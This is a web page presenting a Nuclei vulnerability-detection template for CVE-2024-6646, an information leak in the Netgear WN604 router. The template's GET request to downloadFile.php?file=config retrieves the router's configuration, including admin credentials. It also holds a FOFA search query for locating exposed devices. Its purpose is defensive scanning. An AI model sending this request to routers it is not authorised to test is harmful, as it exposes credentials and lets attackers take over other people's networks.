Skip to content

Netgear-WN604 downloadFile.php - Information Disclosure

ID: CVE-2024-6646

Severity: medium

Author: pussycat0x

Tags: cve,cve2024,netgear

There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router’s background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.

id: CVE-2024-6646
info:
name: Netgear-WN604 downloadFile.php - Information Disclosure
author: pussycat0x
severity: medium
description: |
There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.
reference:
- https://github.com/wy876/POC/blob/main/Ncast%E9%AB%98%E6%B8%85%E6%99%BA%E8%83%BD%E5%BD%95%E6%92%AD%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
- https://github.com/mikutool/vul/issues/1
- https://vuldb.com/?ctiid.271052
- https://vuldb.com/?id.271052
- https://vuldb.com/?submit.367382
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-6646
cwe-id: CWE-200
epss-score: 0.00045
epss-percentile: 0.16001
cpe: cpe:2.3:h:netgear:wn604:*:*:*:*:*:*:*:*
metadata:
fofa-query: title=="Netgear"
product: wn604
vendor: netgear
tags: cve,cve2024,netgear
http:
- method: GET
path:
- "{{BaseURL}}/downloadFile.php?file=config"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "system:basicSettings"
- "system:staSettings"
condition: and
- type: word
part: content_type
words:
- "application/force-download"
- type: status
status:
- 200
# digest: 4a0a0047304502203f97ca83d5da2e18dcf046174649f1d458dc19e9ac4102ce9af57354bcbb4640022100cb41d16d8667975f14ccfc607cf0f80ca52825e3278089368c4de6204c336718:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6646.yaml"

View on Github